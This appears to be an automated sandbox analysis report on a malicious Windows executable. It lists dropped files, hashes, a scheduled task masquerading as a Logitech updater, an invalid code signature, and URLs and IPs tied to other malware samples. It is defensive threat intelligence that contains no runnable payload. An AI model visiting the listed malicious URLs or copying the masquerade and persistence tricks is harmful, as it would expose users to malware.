                                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                      Run name:Run with higher sleep bypass
                                                                                                      Number of analysed new started processes analysed:16
                                                                                                      Number of new started drivers analysed:0
                                                                                                      Number of existing processes analysed:0
                                                                                                      Number of existing drivers analysed:0
                                                                                                      Number of injected processes analysed:1
                                                                                                      Technologies:
                                                                                                      • HCA enabled
                                                                                                      • EGA enabled
                                                                                                      • AMSI enabled
                                                                                                      Analysis Mode:default
                                                                                                      Analysis stop reason:Timeout
                                                                                                      Sample name:5Z1WFRMTOXRH6X21Z8NU8.exe
                                                                                                      Detection:MAL
                                                                                                      Classification:mal100.troj.expl.evad.winEXE@13/7@3/1
                                                                                                      EGA Information:
                                                                                                      • Successful, ratio: 100%
                                                                                                      HCA Information:
                                                                                                      • Successful, ratio: 96%
                                                                                                      • Number of executed functions: 30
                                                                                                      • Number of non-executed functions: 85
                                                                                                      Cookbook Comments:
                                                                                                      • Found application associated with file extension: .exe
                                                                                                      • Sleeps bigger than 100000000ms are automatically reduced to 1000ms

                                                                                                      Warnings

                                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, consent.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, oneocsp.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                      • VT rate limit hit for: 5Z1WFRMTOXRH6X21Z8NU8.exe

                                                                                                      Simulations

                                                                                                      Behavior and APIs

                                                                                                      TimeTypeDescription
                                                                                                      21:43:18Task SchedulerRun new task: logioptionsplus_updater path: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe

                                                                                                      Joe Sandbox View / Context

                                                                                                      IPs

                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                      188.114.97.3PO 4800040256.exeGet hashmaliciousFormBookBrowse
                                                                                                      • www.cc101.pro/4hfb/
                                                                                                      QUOTATION_OCTQTRA071244#U00b7PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                      • filetransfer.io/data-package/cDXpxO66/download
                                                                                                      Instruction_1928.pdf.lnk.download.lnkGet hashmaliciousLummaCBrowse
                                                                                                      • tech-tribune.shop/pLQvfD4d5/index.php
                                                                                                      WBCDZ4Z3M2667YBDZ5K4.bin.exeGet hashmaliciousUnknownBrowse
                                                                                                      • tech-tribune.shop/pLQvfD4d5/index.php
                                                                                                      yGktPvplJn.exeGet hashmaliciousPushdoBrowse
                                                                                                      • www.rs-ag.com/
                                                                                                      https://is.gd/6NgVrQGet hashmaliciousHTMLPhisherBrowse
                                                                                                      • aa.opencompanies.co.uk/vEXJm/
                                                                                                      Comprobante de pago.xlam.xlsxGet hashmaliciousUnknownBrowse
                                                                                                      • paste.ee/d/KXy1F
                                                                                                      01YP9Lwum8.exeGet hashmaliciousDCRatBrowse
                                                                                                      • 77777cm.nyashtyan.in/externalpipejsprocessAuthapiDbtrackWordpressCdn.php
                                                                                                      PO-000041522.exeGet hashmaliciousFormBookBrowse
                                                                                                      • www.freedietbuilder.online/nnla/
                                                                                                      http://onlinecheapflights.net/Get hashmaliciousUnknownBrowse
                                                                                                      • onlinecheapflights.net/

                                                                                                      Domains

                                                                                                      No context

                                                                                                      ASNs

                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                      CLOUDFLARENETUShttps://deborahmeagher.com.de/kfOoB/Get hashmaliciousHTMLPhisherBrowse
                                                                                                      • 104.17.25.14
                                                                                                      VAIIBIHmtT.exeGet hashmaliciousStealcBrowse
                                                                                                      • 104.21.56.70
                                                                                                      Bill Payment__8084746.htmlGet hashmaliciousUnknownBrowse
                                                                                                      • 104.17.25.14
                                                                                                      ACTION required to activate your account - bp Supplier Portal.emlGet hashmaliciousUnknownBrowse
                                                                                                      • 172.66.0.126
                                                                                                      http://www.wattpad.comGet hashmaliciousUnknownBrowse
                                                                                                      • 104.22.74.216
                                                                                                      dekont_001.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                      • 188.114.97.3
                                                                                                      https://docs.google.com/drawings/d/1gvM7ysnJ7zDcSUShXnPoiA6pG4cjDDn9uHRbivsGidA/preview?pli=1jjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZsGet hashmaliciousMamba2FABrowse
                                                                                                      • 104.17.25.14
                                                                                                      (No subject) (92).emlGet hashmaliciousUnknownBrowse
                                                                                                      • 104.18.65.57
                                                                                                      Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                      • 188.114.96.3
                                                                                                      RobCheat.exeGet hashmaliciousPython Stealer, CStealerBrowse
                                                                                                      • 172.67.75.40

                                                                                                      JA3 Fingerprints

                                                                                                      No context

                                                                                                      Dropped Files

                                                                                                      No context

                                                                                                      Created / dropped Files

                                                                                                      C:\Users\user\AppData\Local\Temp\9c813d63

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe
                                                                                                      File Type:PNG image data, 2336 x 1336, 8-bit/color RGB, non-interlaced
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1490149
                                                                                                      Entropy (8bit):7.993654685735998
                                                                                                      Encrypted:true
                                                                                                      SSDEEP:24576:/rn/8iouvLod8ehALdbU5iHTP/xyIjuWoS7i+7ntpYPAtzX7N4ToLQa3pY8U8/:/r/8ML+8QAZbT/IEdomiuPYYiS7D/
                                                                                                      MD5:9293AFEB225399232240F1E3F3255218
                                                                                                      SHA1:E7722613BA9E360D08D55161872908C797E52073
                                                                                                      SHA-256:ADF9640C1D99B3EDECA66D9F8359CF37815C8C2770078527B4570BCE5EBA4CBC
                                                                                                      SHA-512:6C0BA94AFEC426FCEFEDB6741F623E19CFD8F23B63B7FDB2A12B94AB6BE7534D56ED273EFE0FBBA7E9DB87E61F88C923F947493156DC532B57B28936DDF863C7
                                                                                                      Malicious:false
                                                                                                      Reputation:low
                                                                                                      Preview:.PNG........IHDR... ...8.....:.|w.. .IDATx..;.$....+.U.=.^K#........}..w.E.&..%A..6.#.....ec.k..P.s...+........GDVeuuwuw|.N?.3+.z0...=.w.~............py..~.....1..Z....n......8..A.4...#u].K.4MC.%....p..g....a..h...!...?.97w'/XJ..@CUU.R.#UU..K).R..RJ.{Y..K.u......]J..^..y.!.....R...,........b.I%.@7.&wW.1.]..\p\....2..u.......?..........y.Y `..d....;.nH..|k..3..@..l.........?".@vZW..!...v.e.Uww.C..n...?..#..*..(.Y.3b.O+M.s.[.~C.....oo.5...\.a....c.0f...\.2..7..,.1....R.3p....|.`.c.f..w........5P..y..~i........K)..A..+|..$3.......CE..uw)8..P./...J..i.j.....s&...a....~%.........F_.c...V..D.4F.}........>..A...B..o..w..D.....l.X..Rp.5h2..H> 3w..1..t..w.&.|9J.Y..w.......n..|...b....B8bT.}'........p..._....6n..-.../....c.B......../..?........,.w....KyY....,_k.....v.S.{..../.d.Ob.RI\..,..,_)<%*....1.,_J.9.v.....3...ZW.....p/........../...{q.1......>q.........|2.l1.....I...|).&W...K!...w.}....o.....@Q..A.$..K5.!..T......E..R.....>Hh.......7.~!...

                                                                                                      C:\Users\user\AppData\Local\Temp\9d758fdb

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1275486
                                                                                                      Entropy (8bit):7.651198167214753
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24576:AfJB7Oca2gC/dSipEBZGR31m/UTORv5O1+klFPa0R/ISE8VWcftYQc6vCWAoZmWs:E7Br1SVBZ4lmsmYNni+ISEuBFh8gdsE8
                                                                                                      MD5:73680C60EBB8AF0D53D554A508F347FE
                                                                                                      SHA1:6977123C1F1EC26864BED46988D7ECC1292F0E7E
                                                                                                      SHA-256:749FBDD4C1633AB7BEA684BAE3356842B25ED8B233A7E8B25642058A8353DCF0
                                                                                                      SHA-512:C1A4E6412FA2C04CB172AF9DEE2F7DD93F8714B3E0CB2C20712F7F1BEB71F8EE2293BDFCBE81EB3BBEA24236958963855DD23C98059FD3B6ED61AB5C9F3DC3D6
                                                                                                      Malicious:false
                                                                                                      Preview:f..f..e..e..d..A..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..@..!..@.........2.....6...............6......e..e..e..e..e..e..e..e..e..e..e..&......... ...e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..&......,.....e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..@..!...9......... ........e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e......K...W...e..e..e..e..e..e..e..e..e..e..

                                                                                                      C:\Users\user\AppData\Local\Temp\bca94d0c

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe
                                                                                                      File Type:PNG image data, 2336 x 1336, 8-bit/color RGB, non-interlaced
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1490149
                                                                                                      Entropy (8bit):7.993654685735998
                                                                                                      Encrypted:true
                                                                                                      SSDEEP:24576:/rn/8iouvLod8ehALdbU5iHTP/xyIjuWoS7i+7ntpYPAtzX7N4ToLQa3pY8U8/:/r/8ML+8QAZbT/IEdomiuPYYiS7D/
                                                                                                      MD5:9293AFEB225399232240F1E3F3255218
                                                                                                      SHA1:E7722613BA9E360D08D55161872908C797E52073
                                                                                                      SHA-256:ADF9640C1D99B3EDECA66D9F8359CF37815C8C2770078527B4570BCE5EBA4CBC
                                                                                                      SHA-512:6C0BA94AFEC426FCEFEDB6741F623E19CFD8F23B63B7FDB2A12B94AB6BE7534D56ED273EFE0FBBA7E9DB87E61F88C923F947493156DC532B57B28936DDF863C7
                                                                                                      Malicious:false
                                                                                                      Preview:.PNG........IHDR... ...8.....:.|w.. .IDATx..;.$....+.U.=.^K#........}..w.E.&..%A..6.#.....ec.k..P.s...+........GDVeuuwuw|.N?.3+.z0...=.w.~............py..~.....1..Z....n......8..A.4...#u].K.4MC.%....p..g....a..h...!...?.97w'/XJ..@CUU.R.#UU..K).R..RJ.{Y..K.u......]J..^..y.!.....R...,........b.I%.@7.&wW.1.]..\p\....2..u.......?..........y.Y `..d....;.nH..|k..3..@..l.........?".@vZW..!...v.e.Uww.C..n...?..#..*..(.Y.3b.O+M.s.[.~C.....oo.5...\.a....c.0f...\.2..7..,.1....R.3p....|.`.c.f..w........5P..y..~i........K)..A..+|..$3.......CE..uw)8..P./...J..i.j.....s&...a....~%.........F_.c...V..D.4F.}........>..A...B..o..w..D.....l.X..Rp.5h2..H> 3w..1..t..w.&.|9J.Y..w.......n..|...b....B8bT.}'........p..._....6n..-.../....c.B......../..?........,.w....KyY....,_k.....v.S.{..../.d.Ob.RI\..,..,_)<%*....1.,_J.9.v.....3...ZW.....p/........../...{q.1......>q.........|2.l1.....I...|).&W...K!...w.}....o.....@Q..A.$..K5.!..T......E..R.....>Hh.......7.~!...

                                                                                                      C:\Users\user\AppData\Local\Temp\be3cb5d2

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe
                                                                                                      File Type:PNG image data, 2336 x 1336, 8-bit/color RGB, non-interlaced
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1490149
                                                                                                      Entropy (8bit):7.993654685735998
                                                                                                      Encrypted:true
                                                                                                      SSDEEP:24576:/rn/8iouvLod8ehALdbU5iHTP/xyIjuWoS7i+7ntpYPAtzX7N4ToLQa3pY8U8/:/r/8ML+8QAZbT/IEdomiuPYYiS7D/
                                                                                                      MD5:9293AFEB225399232240F1E3F3255218
                                                                                                      SHA1:E7722613BA9E360D08D55161872908C797E52073
                                                                                                      SHA-256:ADF9640C1D99B3EDECA66D9F8359CF37815C8C2770078527B4570BCE5EBA4CBC
                                                                                                      SHA-512:6C0BA94AFEC426FCEFEDB6741F623E19CFD8F23B63B7FDB2A12B94AB6BE7534D56ED273EFE0FBBA7E9DB87E61F88C923F947493156DC532B57B28936DDF863C7
                                                                                                      Malicious:false
                                                                                                      Preview:.PNG........IHDR... ...8.....:.|w.. .IDATx..;.$....+.U.=.^K#........}..w.E.&..%A..6.#.....ec.k..P.s...+........GDVeuuwuw|.N?.3+.z0...=.w.~............py..~.....1..Z....n......8..A.4...#u].K.4MC.%....p..g....a..h...!...?.97w'/XJ..@CUU.R.#UU..K).R..RJ.{Y..K.u......]J..^..y.!.....R...,........b.I%.@7.&wW.1.]..\p\....2..u.......?..........y.Y `..d....;.nH..|k..3..@..l.........?".@vZW..!...v.e.Uww.C..n...?..#..*..(.Y.3b.O+M.s.[.~C.....oo.5...\.a....c.0f...\.2..7..,.1....R.3p....|.`.c.f..w........5P..y..~i........K)..A..+|..$3.......CE..uw)8..P./...J..i.j.....s&...a....~%.........F_.c...V..D.4F.}........>..A...B..o..w..D.....l.X..Rp.5h2..H> 3w..1..t..w.&.|9J.Y..w.......n..|...b....B8bT.}'........p..._....6n..-.../....c.B......../..?........,.w....KyY....,_k.....v.S.{..../.d.Ob.RI\..,..,_)<%*....1.,_J.9.v.....3...ZW.....p/........../...{q.1......>q.........|2.l1.....I...|).&W...K!...w.}....o.....@Q..A.$..K5.!..T......E..R.....>Hh.......7.~!...

                                                                                                      C:\Users\user\AppData\Local\Temp\bf266e95

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1275486
                                                                                                      Entropy (8bit):7.6512612464596295
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24576:hfJB7Oca2gC/dSipEBZGR31m/UTORv5O1+klFPa0R/ISE8VWcftYQc6vCWAoZmWs:Z7Br1SVBZ4lmsmYNni+ISEuBFh8gdsE8
                                                                                                      MD5:81B48765128043CAF286FDA096616A63
                                                                                                      SHA1:7A7D80908F6A17A8BFA2A08F372EDD83460D9F3D
                                                                                                      SHA-256:C380E7BAA26116D71ACFF5FDF1EC6783AC8A8C93EB5179370EAB08000625621B
                                                                                                      SHA-512:640C5FAA7709719248E0E4935BB531C36A290B83574553262943A46965A949E22EAF3EB3415DE7630591D49D3AE766034A2D03D05750E1E901132B63B08370C3
                                                                                                      Malicious:false
                                                                                                      Preview:f..f..e..e..d..A..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..@..!..@.........2.....6...............6......e..e..e..e..e..e..e..e..e..e..e..&......... ...e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..&......,.....e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..@..!...9......... ........e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e......K...W...e..e..e..e..e..e..e..e..e..e..

                                                                                                      C:\Users\user\AppData\Local\Temp\cnfpnteryde

                                                                                                      Download File
                                                                                                      Process:C:\Windows\SysWOW64\more.com
                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                      Category:dropped
                                                                                                      Size (bytes):541184
                                                                                                      Entropy (8bit):6.530879228641325
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12288:8/zT9HFapB2rA6MNzFhCjzYjGq88DUq18p8sg:bpBbBhCPD8DHSE
                                                                                                      MD5:A3EBAF3CD91B6B57CE7949FC51398080
                                                                                                      SHA1:2F149696DD3F00423062CDF28B6821052D5C1D38
                                                                                                      SHA-256:759B9B860FAED4ECCD18EB34457584D0C799601C3613A8178C2404C5ADE18319
                                                                                                      SHA-512:8CD7742BB99DE1C8F09A1CFE2AD63D12C9D2B28A41E4DA86E62A5B4B6A2187BE2230CD5A03CF4FBB23FA6EDB8517238B4C035BB84B2DC15769F17C79D4608BAC
                                                                                                      Malicious:true
                                                                                                      Antivirus:
                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D...*...*...*..)...*../.r.*......*..)...*../..*.......*......*..+...*...+.?.*...#...*.......*...(...*.Rich..*.........PE..L......X..........................................@.......................................@..................................5...................................E..t...8...............................@...............@............................text............................... ..`.rdata...I.......J..................@..@.data....m...P...,...>..............@....rsrc................j..............@..@.reloc...E.......F...l..............@..Bdld.......... ......................@...................................................................................................................................................................................................................................................................

                                                                                                      C:\Users\user\AppData\Local\Temp\vkqcbyjdfiw

                                                                                                      Download File
                                                                                                      Process:C:\Windows\SysWOW64\more.com
                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                      Category:dropped
                                                                                                      Size (bytes):541184
                                                                                                      Entropy (8bit):6.530879228641325
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12288:8/zT9HFapB2rA6MNzFhCjzYjGq88DUq18p8sg:bpBbBhCPD8DHSE
                                                                                                      MD5:A3EBAF3CD91B6B57CE7949FC51398080
                                                                                                      SHA1:2F149696DD3F00423062CDF28B6821052D5C1D38
                                                                                                      SHA-256:759B9B860FAED4ECCD18EB34457584D0C799601C3613A8178C2404C5ADE18319
                                                                                                      SHA-512:8CD7742BB99DE1C8F09A1CFE2AD63D12C9D2B28A41E4DA86E62A5B4B6A2187BE2230CD5A03CF4FBB23FA6EDB8517238B4C035BB84B2DC15769F17C79D4608BAC
                                                                                                      Malicious:true
                                                                                                      Antivirus:
                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D...*...*...*..)...*../.r.*......*..)...*../..*.......*......*..+...*...+.?.*...#...*.......*...(...*.Rich..*.........PE..L......X..........................................@.......................................@..................................5...................................E..t...8...............................@...............@............................text............................... ..`.rdata...I.......J..................@..@.data....m...P...,...>..............@....rsrc................j..............@..@.reloc...E.......F...l..............@..Bdld.......... ......................@...................................................................................................................................................................................................................................................................

                                                                                                      Static File Info

                                                                                                      General

                                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                      Entropy (8bit):7.332090535652735
                                                                                                      TrID:
                                                                                                      • Win32 Executable (generic) a (10002005/4) 99.53%
                                                                                                      • Win32 EXE PECompact compressed (generic) (41571/9) 0.41%
                                                                                                      • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                                      File name:5Z1WFRMTOXRH6X21Z8NU8.exe
                                                                                                      File size:11'391'336 bytes
                                                                                                      MD5:ff827141856089465cec7afdc9e65f9d
                                                                                                      SHA1:e985a1d59d90a6522b4077b00bc68c86fc3d72d8
                                                                                                      SHA256:389d5818cb26a1cc113481b66332d164dc76d2c85d8735c074a9bc2409b8c9c0
                                                                                                      SHA512:b3624f61c2d0e07d93d96db2632576262a211ec158334703f9f1b003853cfb5c5eefea33cab9c2a813e1dc7099e542062d3c1a44a7a9f1828919880823aa9cac
                                                                                                      SSDEEP:196608:64gA641E83DUpCdO3url7Dtm5fal48DueJO475d:rgdBUfdO3cRDtj/aOd
                                                                                                      TLSH:7DB6D012F688A0BBC057193698378795593777B06E268D973BB40E8C4F36780BA3E747
                                                                                                      File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

                                                                                                      File Icon

                                                                                                      Icon Hash:3636276e1c317306

                                                                                                      Static PE Info

                                                                                                      General

                                                                                                      Entrypoint:0x9d5930
                                                                                                      Entrypoint Section:.itext
                                                                                                      Digitally signed:true
                                                                                                      Imagebase:0x400000
                                                                                                      Subsystem:windows gui
                                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT
                                                                                                      Time Stamp:0x6684095A [Tue Jul 2 14:06:18 2024 UTC]
                                                                                                      TLS Callbacks:
                                                                                                      CLR (.Net) Version:
                                                                                                      OS Version Major:5
                                                                                                      OS Version Minor:0
                                                                                                      File Version Major:5
                                                                                                      File Version Minor:0
                                                                                                      Subsystem Version Major:5
                                                                                                      Subsystem Version Minor:0
                                                                                                      Import Hash:dc590f1f896fa986fbb15c6fda7fd22f

                                                                                                      Authenticode Signature

                                                                                                      Signature Valid:false
                                                                                                      Signature Issuer:CN=Microsoft ID Verified CS EOC CA 01, O=Microsoft Corporation, C=US
                                                                                                      Signature Validation Error:The digital signature of the object did not verify
                                                                                                      Error Number:-2146869232
                                                                                                      Not Before, Not After
                                                                                                      • 01/07/2024 16:37:15 04/07/2024 16:37:15
                                                                                                      Subject Chain
                                                                                                      • CN=BURNAWARE SL, O=BURNAWARE SL, L=MARBELLA, S=M\xe1laga, C=ES
                                                                                                      Version:3
                                                                                                      Thumbprint MD5:F53247DEBF3F4A6D95461954E622CA1F
                                                                                                      Thumbprint SHA-1:D5B2FCC7421A032C296119FDA6EAF5A7FC39B7FD
                                                                                                      Thumbprint SHA-256:CD072073D0E45F03C58F8CCE10D56FF6D8C7D93DAFF86CA3709AAF784F7C1E2F
                                                                                                      Serial:330000822E80A10BDCFC2F33C000000000822E

                                                                                                      Entrypoint Preview

                                                                                                      Instruction
                                                                                                      push ebp
                                                                                                      mov ebp, esp
                                                                                                      add esp, FFFFFFF0h
                                                                                                      mov eax, 009C67A0h
                                                                                                      call 00007F8C647C1B95h
                                                                                                      xor eax, eax
                                                                                                      push ebp
                                                                                                      push 009D599Ah
                                                                                                      push dword ptr fs:[eax]
                                                                                                      mov dword ptr fs:[eax], esp
                                                                                                      mov eax, dword ptr [009FB70Ch]
                                                                                                      mov eax, dword ptr [eax]
                                                                                                      call 00007F8C649BEA43h
                                                                                                      mov eax, dword ptr [009FB70Ch]
                                                                                                      mov eax, dword ptr [eax]
                                                                                                      mov dl, 01h
                                                                                                      call 00007F8C649C06B5h
                                                                                                      mov ecx, dword ptr [009FB7B4h]
                                                                                                      mov eax, dword ptr [009FB70Ch]
                                                                                                      mov eax, dword ptr [eax]
                                                                                                      mov edx, dword ptr [009BA9F0h]
                                                                                                      call 00007F8C649BEA35h
                                                                                                      mov eax, dword ptr [009FB70Ch]
                                                                                                      mov eax, dword ptr [eax]
                                                                                                      call 00007F8C649BEB85h
                                                                                                      xor eax, eax
                                                                                                      pop edx
                                                                                                      pop ecx
                                                                                                      pop ecx
                                                                                                      mov dword ptr fs:[eax], edx
                                                                                                      push 009D59A1h
                                                                                                      ret
                                                                                                      jmp 00007F8C647BA5DEh
                                                                                                      jmp 00007F8C64D8674Ah
                                                                                                      call 00007F8C647BAD2Bh
                                                                                                      mov eax, eax
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al

                                                                                                      Data Directories

                                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x7c00000x9b.edata
                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x7bb0000x3ee2.idata
                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x82c0000x470c88.rsrc
                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0xad94000x3d68.rsrc
                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x7c30000x68d8a
                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
